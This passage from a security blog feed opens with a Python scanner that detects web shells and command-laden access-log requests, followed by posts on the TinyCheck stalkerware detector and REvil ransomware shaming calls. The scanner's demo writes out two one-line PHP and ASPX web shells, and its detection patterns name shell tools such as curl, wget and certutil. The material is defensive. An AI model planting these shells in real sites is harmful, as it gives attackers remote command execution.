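# Constructed patterns (not Malwarebytes' Backdoor.WebShell signatures): request input flowing
# straight into code or shell execution, which is what a generic web shell looks like.
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)"
SUSPICIOUS_PATTERNS = {
    "php_backtick_exec": re.compile(r"`[^`]*" + REQUEST_INPUT + r"[^`]*`"),
    "php_exec_call": re.compile(
        r"\b(?:eval|system|exec|shell_exec|passthru|assert)\s*\([^)]*" + REQUEST_INPUT),
    "aspx_eval": re.compile(r"(?i)\b(?:eval|execute)\s*\(.*Request\s*[\[.]"),
    "aspx_process_start": re.compile(r"(?i)Process\.Start\s*\(.*Request"),
}
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp"}


def scan_file(path):
    """Return the names of the patterns matched in one file (empty list if clean or unreadable)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            content = fh.read()
    except OSError:
        return []
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(content)]


def scan_tree(root):
    """Walk a web root; return {relative path: [matched patterns]} for every suspicious script."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            matches = scan_file(full)
            if matches:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = matches
    return hits


# Access-log side. The tiny shell in the article is driven entirely by a query parameter, so a
# request whose parameter value looks like a shell command is the trace it leaves in the logs.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
COMMAND_HINT = re.compile(
    r"(?:^|[;&|\s])(?:whoami|id|cat|ls|dir|powershell|cmd|net\s+user|certutil|curl|wget)\b", re.I)

# Constructed Apache/nginx-style access-log lines, not a real capture.
SAMPLE_LOG = [
    '203.0.113.10 - - [08/Mar/2021:10:00:00 +0000] "GET /index.html?1=whoami HTTP/1.1" 200 12',
    '198.51.100.7 - - [08/Mar/2021:10:00:05 +0000] "GET /index.html?page=about HTTP/1.1" 200 4521',
    '203.0.113.10 - - [08/Mar/2021:10:00:09 +0000] "GET /index.html?1=ls%20-la HTTP/1.1" 200 800',
]


def suspicious_requests(log_lines):
    """Return (client ip, path, parameter, decoded value) for parameters that look like commands."""
    found = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for key, values in parse_qs(parts.query).items():
            for value in values:
                if COMMAND_HINT.search(value):
                    found.append((m.group("ip"), parts.path, key, value))
    return found


def demo():
    """Build a constructed web root (one benign page, two shells) and scan it plus SAMPLE_LOG."""
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        "uploads/x.php": "<?=`$_GET[1]`?>",  # the tiny shell quoted in the article
        "uploads/cmd.aspx": '<%@ Page Language="C#" %><% Response.Write(eval(Request["c"])); %>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        file_hits = scan_tree(root)
    return {"files": file_hits, "requests": suspicious_requests(SAMPLE_LOG)}


if __name__ == "__main__":
    print(demo())
```

The file scan is deliberately generic rather than hash based, because a copycat shell only needs one character changed to defeat a hash; the log check is useful even after a shell has been removed, since it tells you which client addresses were driving it and what they asked for. Both produce candidates for a human to review, not verdicts.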

[Image: Malwarebytes Nebula detecting Backdoor.Hafnium]

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malwarebytes Labs.

TinyCheck: Stalkerware detection that doesn’t leave a trace

In 2019, when Malwarebytes helped found the Coalition Against Stalkerware, which brings together cybersecurity vendors and nonprofits to detect and raise awareness about stalkerware, we encountered a significant roadblock in our fight: For some users, the very detection of these potentially privacy-invasive tools could put their lives at greater risk.

In short, we needed a way to detect stalkerware-type apps without the detection being discoverable by stalkerware-type apps or their users.

Now, a new tool makes that far more possible.

Developed by a small team at Kaspersky, “TinyCheck” represents the latest technological effort from a Coalition Against Stalkerware member to continue the fight against a digital threat that can rob people of their expectation of, and right to, privacy. It is just one of the many advancements from the Coalition Against Stalkerware, which meets routinely to discuss ongoing research, new member applications, regional outreach, and advances in detections.

What is TinyCheck?

TinyCheck is an open-source tool available on GitHub that requires a higher technical skillset than downloading and running any of the apps made by the Coalition Against Stalkerware’s cybersecurity vendors. Those apps, like Malwarebytes for Android, are installed directly on a device where they can perform malware scans to detect and remove suspicious or dangerous programs.

TinyCheck, on the other hand, runs separately from the smartphone, on a computer such as a Raspberry Pi. Functionally, TinyCheck is configured to act as a WiFi access point. Once set up and connected to a smartphone, TinyCheck analyzes that smartphone’s Internet traffic and determines whether it is sending data to a known malicious server.

Kristina Shingareva, head of external relations for Kaspersky, said that TinyCheck “was built with the idea of making it impossible to identify its use via a stalkerware app.”

“The analysis of the checked device is only available to the individual person using TinyCheck with their own equipment,” Shingareva said. “It is not shared anywhere: neither Kaspersky nor any other party will receive this data.”

Further, Shingareva said that TinyCheck analyses are performed locally, and the data from those analyses, including full packet capture, logs, and a PDF report, can only end up on a USB stick that users can plug in to save records, or on a computer, if TinyCheck is running in a browser from a remote workstation.
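To make the network-side approach concrete, here is an added example of the kind of check a tool sitting on the access point can run over captured traffic once destination names and addresses have been extracted. It is written for this post and is not TinyCheck's code; the indicator domains and network, and the flow records, are constructed placeholders. Destinations are matched against indicator domains on a label boundary (so a lookalike name that merely contains the indicator does not match) and against indicator IP ranges, then summarized per indicator so the person running the check can see how much data went where and when. Everything stays local, in keeping with how the tool is described above.

```python
import ipaddress

# Constructed indicators (placeholders, not TinyCheck's or Kaspersky's real lists).
INDICATOR_DOMAINS = {"sync.example-stalker.test", "api.tracker-cloud.test"}
INDICATOR_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed flow records in the shape an access point capture yields once DNS names or TLS
# SNI have been extracted: (timestamp, destination host or IP, destination port, bytes sent).
SAMPLE_FLOWS = [
    ("2021-03-08T10:00:01", "www.example.com", 443, 1800),
    ("2021-03-08T10:00:07", "upload.sync.example-stalker.test", 443, 524288),
    ("2021-03-08T10:02:40", "notsync.example-stalker.test", 443, 900),            # lookalike, must not match
    ("2021-03-08T10:03:15", "sync.example-stalker.test.example.com", 443, 700),  # indicator buried mid-name
    ("2021-03-08T10:05:12", "198.51.100.23", 8443, 91234),
    ("2021-03-08T10:06:00", "cdn.example.org", 443, 40000),
    ("2021-03-08T10:10:30", "upload.sync.example-stalker.test", 443, 610000),
]


def domain_matches(host, indicators):
    """Return the indicator domain that host equals or is a subdomain of, else None.
    The suffix check is done on a label boundary so 'notsync.example-stalker.test' does not match."""
    host = host.lower().rstrip(".")
    for ind in indicators:
        if host == ind or host.endswith("." + ind):
            return ind
    return None


def ip_matches(host, networks):
    """Return the indicator network containing host if host is a literal IP inside one, else None."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None
    for net in networks:
        if addr in net:
            return str(net)
    return None


def analyze(flows, domains=INDICATOR_DOMAINS, networks=INDICATOR_NETWORKS):
    """Group flows by matched indicator and summarize volume and timing per indicator."""
    report = {}
    for ts, dst, port, bytes_out in flows:
        ind = domain_matches(dst, domains) or ip_matches(dst, networks)
        if ind is None:
            continue
        entry = report.setdefault(
            ind, {"flows": 0, "bytes_out": 0, "first_seen": ts, "last_seen": ts, "ports": set()})
        entry["flows"] += 1
        entry["bytes_out"] += bytes_out
        entry["first_seen"] = min(entry["first_seen"], ts)  # ISO timestamps sort lexically
        entry["last_seen"] = max(entry["last_seen"], ts)
        entry["ports"].add(port)
    return report


def render_report(report):
    """Plain-text lines suitable for the kind of local-only report the article describes."""
    if not report:
        return ["No traffic to known indicators observed."]
    lines = []
    for ind, e in sorted(report.items()):
        ports = ",".join(str(p) for p in sorted(e["ports"]))
        lines.append(f"{ind}: {e['flows']} flow(s), {e['bytes_out']} bytes out, "
                     f"ports {ports}, {e['first_seen']} .. {e['last_seen']}")
    return lines


if __name__ == "__main__":
    for line in render_report(analyze(SAMPLE_FLOWS)):
        print(line)
```

The byte counts matter as much as the matches: a stalkerware app that uploads recordings and messages shows up as sustained outbound volume to the same destination, which is a stronger signal than a single DNS lookup and is something a device-side scanner that the app can watch will never produce.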

This may sound like a lot of technical fuss for the everyday user, but the value is tremendous. When used correctly, TinyCheck can overcome what we are calling the “stalkerware detection dilemma.”

The stalkerware detection dilemma

For years, the detection of stalkerware-type apps followed the same model: If a user thought they had a malicious app on their phone, they downloaded a separate, anti-malware app to find that malicious app and then potentially root it out.

This makes sense, as early stalkerware detection fell somewhat haphazardly to the individual cybersecurity vendors that were already protecting people’s computers from other cyberthreats, such as malware, ransomware, and Trojans.

But as effective as that cyberthreat detection model is, it makes a lot of assumptions about its users. First, it assumes that users have full agency of their computers and devices, able to download a separate program on their own, and then run that program with little interference. Second, it assumes that the removal of a cyberthreat is the best way to keep a user safe.

In reality, those assumptions could be dangerous when dealing with stalkerware.

As we have written about on Malwarebytes Labs, there is a documented intersection between stalkerware use and domestic abuse. Domestic abusers have repeatedly used these tools to invade the privacy of their partners’ lives, prying into their text messages and emails, revealing their web browsing history, pinpointing their GPS location, and secretly recording their phone calls.

For many domestic abusers, stalkerware can serve as a digital method to maintain control of their partner’s life. For the survivor, then, the removal of a stalkerware-type app can actually cause more harm, cutting off their abuser’s control and only enraging them. Further, many domestic abuse survivors simply do not have sufficient device control to download and run an anti-malware application on their phone. Their phones may be shared with their abusers, or their phone’s passcode may be required to be shared, or their abuser may not even allow them to have a passcode on their phone at all.

Finally, some stalkerware-type apps can also see a device’s most recently installed app, the device’s screen when active, and the notifications delivered to the device, which could in turn reveal that a survivor downloaded an anti-malware scanner, used the scanner, and then received a notification about a stalkerware-type app present on the device.

Here, then, is the stalkerware detection dilemma: How can we safely detect these threats when the detections themselves could lead to more harm?

It is a question that many members of the Coalition Against Stalkerware have asked, and shortly after the Coalition welcomed Centre Hubertine Auclert as an associate partner, the French organization began working with Kaspersky to find a solution. Inspired by the opportunity, Kaspersky researcher Félix Aimé charged ahead, eventually releasing the first version of TinyCheck last year.

It has since gained new features and seen promising adoption.

Big impact

Though TinyCheck has a higher technical bar for use, it can help address an important gap.

According to Shingareva, Kaspersky relied on several of its experts to run a workshop in January that invited individuals from 15 French associations working to prevent and protect people from domestic abuse. Shingareva said that the company is also supporting TinyCheck in Australia, where it will launch a pilot phase of testing with the network committed to women’s domestic and family violence services, WESNET.

So far, TinyCheck has also been “starred” by more than 1,700 users on GitHub, and the introductory video to TinyCheck on YouTube has obtained more than 4,600 views.

Recently, Kaspersky’s developers updated TinyCheck to be able to send notifications to users when new updates are available. The company is also adding new languages to the user interface, with current functionality available in English, French, Spanish, and Catalan.

Shingareva said it is important that advocate networks and non-governmental organizations committed to protecting survivors of domestic abuse are heavily involved in the further development of TinyCheck. With yet another tool to help fight against stalkerware threats, we are hopeful for the future.

The post TinyCheck: Stalkerware detection that doesn’t leave a trace appeared first on Malwarebytes Labs.

REvil ransomware’s calling, and it’s not good news

The REvil ransomware (AKA Sodinokibi, which operates as a Ransomware as a Service) is adopting some outreach techniques after initial compromise, designed to shame victims into paying up.

Shaming victims into action

Malware authors and social engineers have relied on shame and the threat of exposure for years. Nothing encourages potential victims to pay up like a solid threat. This isn’t something to underestimate or dismiss. It can have very serious consequences, with at least one tragedy involving a suicide linked to common-or-garden ransomware threats. 

These threats are most closely linked to people at home, with sextortion being one of the biggest.

This is where victims are told someone has footage of them watching pornographic material or engaging in sexual activity. If they don’t pay the Bitcoin ransom, the scammers will release the footage to the world at large, or even just to friends and family. The threat is usually backed by an old password taken from a password dump, one that has probably long since been changed, which lends it some perceived credibility. The ransomware authors have no footage whatsoever, but it’s a very effective tactic.

From consumer to corporate…

In recent developments, ransomware bought itself a business suit and a nice tie and started working its way into the corporate world. Here the gimmick was compromising the network, locking up important files and/or servers, and demanding cash to release them back to the victims.

This quickly became a mess of arguments over paying the ransom, and the world of cyber insurance and whether it would actually insure against these types of attacks. It also led into the concept of ransomware authors ruining their own trust model with broken unlocks or missing decryption keys.

This time it’s personal

Typical ransomware attacks involve encrypting all available files. More recently, attackers have added data exfiltration to their box of tricks, along with threats to leak the stolen data if victims manage to recover from the encryption without the attacker’s help.

A well-worn security notion is that we never know the full story in terms of numbers compromised by attack X or Y. This seems a reasonable assumption; lots of consumer and business victims of cybercrime do not want to publicize it. There may be liability issues they’re trying to keep hidden, or perhaps they don’t want the embarrassment of everyone knowing what happened.

This latest development twists the exfiltration knife a bit harder by using a splash of shame to encourage victims to pay up.

The scammers perform outreach to the media and the victim’s clients. The idea here is to keep heaping pressure on the victims until they relent and pay up. VoIP calls seem to be the method of choice for said outreach, which helps keep callers anonymized.

As noted by Bleeping Computer, similar tactics have been used in the past, but those calls focused on the victims. Threatening to expose a compromised machine or network via journalists or business affiliates is upping the stakes quite a bit.

Just as there is no guarantee of receiving a decryption key after paying a ransom, there is no guarantee the attackers will play nice afterwards. Regardless of the tactics used, the end result is always the same: pay up, or else.

Putting scammers on the do-not-call list

Options may be limited depending on how prepared victims are at the start of a ransomware attack. It may well be that files are unrecoverable, or business operations cease while cleanup takes place.

It could be that a huge payout is handed to the attackers and no files are returned. Or the victim may get lucky, with all services restored and no mention outside the four walls of the affected business. It’s simply a lottery, though there are a few ways you can even the odds. Stay safe out there, and hopefully you’ll never have to hear a ransomware fan at the other end of a telephone line.

The post REvil ransomware’s calling, and it’s not good news appeared first on Malwarebytes Labs.